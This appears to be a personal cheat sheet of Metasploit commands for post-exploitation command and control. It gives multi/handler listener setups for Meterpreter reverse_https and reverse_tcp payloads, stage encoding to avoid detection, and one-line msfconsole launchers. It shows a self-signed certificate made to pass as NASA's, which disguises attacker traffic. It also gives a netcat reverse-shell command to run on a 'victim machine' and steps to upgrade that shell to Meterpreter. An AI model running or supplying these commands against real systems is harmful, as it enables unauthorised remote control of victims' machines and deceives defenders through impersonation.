Listeners

- Listener

• Syntax

use exploit/multi/handler

set PAYLOAD <PAYLOAD>

set LHOST <LHOST>

set LPORT <LPORT>

set ExitOnSession false

exploit -j -z

• HTTPS Listener with encoding

use exploit/multi/handler

set LHOST <LHOST>

set LPORT <LPORT>

set payload windows/x64/meterpreter/reverse_https

set EnableStageEncoding true

set StageEncoder x64/zutto_dekiru

exploit

• To satrt a listener as a job while being in another session:

background

exploit -j

• To direcly load a listener:

msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST 198.168.1.1; set LPORT 443; set EXITFUNC thread; run'

msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 198.168.1.1; set LPORT 443; set EXITFUNC thread; run'

• To add a certificate:

openssl req -new -x509 -nodes -out cert.crt -keyout priv.key

US

TX

Houston

NASA

JSC

nasa.gov

info@nasa.gov

cat priv.key cert.crt > nasa.pem

nano /etc/ssl/openssl.cnf

CipherString=DEFAULT

set HandlerSSLCert /home/kali/self_cert/nasa.pem

exploit

- To upgrade a normal shell to a meterpreter shell:

First we start a generic_tcp_listener or windows/shell/reverse_tcp payload in the exploit/multi/handler metasploit module.

Then we send the reverse shell, if we already have a shell we upload netcat to the victim machine and netcat.exe -e cmd {My IP} {port}

Once we have a normal shell in metasploit we send it to the background (CTRL + Z)

We can check we have that active session with sessions -l

Then to upgrade that session to a meterpreter session:

search shell_to_meterpreter

use post/multi/manage/shell_to_meterpreter

set session 1 (Check with sessions -l the session ID)

run

sessions -i 2